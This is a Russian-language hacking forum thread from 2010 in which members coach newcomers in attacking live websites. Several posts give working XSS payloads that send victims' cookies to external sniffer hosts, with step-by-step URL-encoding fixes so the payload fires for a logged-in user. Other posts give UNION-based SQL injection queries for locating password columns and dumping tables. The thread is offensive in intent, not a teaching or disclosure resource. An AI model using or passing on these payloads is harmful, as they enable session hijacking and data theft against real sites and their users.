11.07.2010, 15:38
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от Seravin
когда тебе нужно просмотреть кучу баз и кучу таблиц, то ручками ты потеряешь довольно много времени, ну а если это можно сделать программно, то зачем же его терять? если программно не получилось, то тогда да, нужно уже руками делать
Естественно, когда уже скуль найдена и вывод есть, то дампить или выводить данные можно программно - лично я так и делаю. А искать вручную.
|
|
|
11.07.2010, 17:53
|
|
Участник форума
Регистрация: 29.11.2007
Сообщений: 116
С нами:
9709737
Репутация:
88
|
|
Верно, согласен, ищешь для начала в ручную, потому как проги далеко не все жрут и находят, а пот дампить 200к записей в ручную, это абсолютно не реально, а вот если только пасс накопать, тогда понятно, можно и ручками.
Сори за оффтоп
|
|
|
|
11.07.2010, 22:12
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше? Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером? Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html - это читал, но не нашел (или не понял) ответа(( |
|
|
|
11.07.2010, 22:34
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
Сообщение от Boa
Глуповатый вопрос. Например, нашел я пару пассивных хссок на одном сайте... Что дальше?
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Сообщение от Boa
Нужно взять где-то исходники сниффера и поставить их на каком-нибудь хосте, или можно воспользоваться античатовским сниффером?
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Сообщение от Boa
Какой код надо сунуть в урл, чтобы куки отправлялись на сниффер?
Не пинайте только)
/thread20140.html
- это читал, но не нашел (или не понял) ответа(( Почитай еще, там есть ответ на твой последний вопрос..
Сообщение от None
###Как его подставить к ссылке с Xss?
Да очень легко...
Есть несколко вариантов:
- 1)делаем вот так:
http://*****.ru/free?p='>img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;"+document.cookie;
где **** сайт с Xss.
Вот сам составленый скрипт:
'>img = new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
- 2)Можно ещё делать вот так:
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
|
|
|
|
11.07.2010, 23:11
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Сообщение от None
Если на сайте с авторизацией, то сунуть админу, если нет - забить.
Есть)
Сообщение от None
Ачатовский не пашет, есть другие, но можно поставить свой. Можешь поискать сниф от Kanick'a _http://www.kanick.ru/sniffer/
Персонал-версию скачал, поставил на хосте, конфиг оставил как есть. Попробовал дать залогиненному юзеру ссылку с
Код:
img=new Image();img.src="http://*****.ru/sniffer/i.gif?"+document.cookie;"+document.cookie;
, и ссылку с
Код:
img=new Image();img.src="http://*****.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
, т.к. не знаю, адрес какой картинки подставлять) Но на сниффер ничего не пришло. Или я совсем туплю и нужно указывать адрес вовсе не к картинке? Запутался.
|
|
|
|
11.07.2010, 23:26
|
|
Познающий
Регистрация: 18.10.2009
Сообщений: 80
С нами:
8718197
Репутация:
11
|
|
2Boa
качай делюкс _ссылка самоуничтожится через 5 минут
+ надо немного подправить конф ($sniffer_path = "http://sniffer_path/")
+ там есть немного фака
имхо, но лучше так
http://*****.ru/free?p='>
где обращаетса к http://haknet.h16.ru/script/js.js
а в js.js есть:
img=new Image();img.src="http://antichat.org/s/HakNet.gif?"+document.cookie;
этот способ более надёжен.
ПС
сылка должнa быть не на нартинку (i.gif) а на скрипт(s.gif)
|
|
|
|
11.07.2010, 23:47
|
|
Новичок
Регистрация: 30.05.2010
Сообщений: 25
С нами:
8395840
Репутация:
5
|
|
Код:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом. |
|
|
|
12.07.2010, 00:01
|
|
Новичок
Регистрация: 04.12.2005
Сообщений: 6
С нами:
10753628
Репутация:
1
|
|
Сообщение от Dare
Decoy
хм... пробуй такой запрос site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(concat_ws(0x3a,table_schema,TABLE_NA ME)+SEPARATOR+0x3C62723E)+from+information_schema. columns+where+column_name+like+0x257061737325+or+c olumn_name+like+0x25702577256425--+
Далее из полученных таблиц выводи имена колонок:
site.com/fail.php?id=-1+union+select
+GROUP_CONCAT(column_name)+SEPARATOR+0x3C62723E)+f rom+information_schema.columns+where+table_name=з ахексенное.имя.таблицы--+
получаешь имена колонок, и:
site.com/fail.php?id=-1+union+select
+concat_ws(0x3a,имена необходимых колонок)+from+iимя.таблицы--+ (если не будет вывода через точку имя_базы.имя_таблицы)
ЗЫ: +(пробел) перед коментариями не нужен) =) всего)
Привет!
Спасибо за ответ! Первый запрос не отработал - результат тот же (долгая загрузка, пустая страница).
Интересное наблюдение:
Код:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.user_privileges--+
работает, а
Код:
http://example.com/detail.php?id=-1+union+select+1,2,3,4,5+from+information_schema.tables--+
нет.
Получается, смотреть некоторые таблицы из INFORMATION_SCHEMA удается, другие - нет. Причем не сильно похоже на разграничение доступа, в противном случае была бы ошибка.
|
|
|
|
12.07.2010, 00:08
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 1
С нами:
10992741
Репутация:
0
|
|
Сообщение от Boa
Код:
http://******.ru/archive.php?year=img=new Image();img.src="http://******.ru/sniffer/s.gif?"+document.cookie;"+document.cookie;
Что тут неправильно?( Путь в конфиге прописал.
Второй вариант трудоемок, а у меня два ночи) попробую потом.
Сообщение от None
img=new Image();
Пробел видишь ? Там после передачи будет стоять %20
А выглядеть он будет так :
Сообщение от None
img=new%20Image();
Чтобы там был пробел после передачи надо поставить +.
это во первых, а во вторых везде где стоять + замени их на %2b,после передачи там автоматически будет стоять +,если не поставишь %2b там будет стоять пробел
Вот например:
Код:
http://*.ru/archive.php?year=img=new+Image();img.src="http://*.ru/sniffer/s.gif?"%2bdocument.cookie;"
|
|
|
|
12.07.2010, 01:44
|
|
Новичок
Регистрация: 26.04.2010
Сообщений: 26
С нами:
8444531
Репутация:
53
|
|
Decoy
Ну если первый запрос не сработал значит там нет таблиц отвечающих критерию запроса => нужно составить запрос по другому, пробуй захексить column_name=user
без процентиков, а вобще с линком былобы просще... сори больше не знаю что тебе посоветовать)
PS:проверь таблицы вставив в принтабельное поле count(*) фромь так же как в посте выше.
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
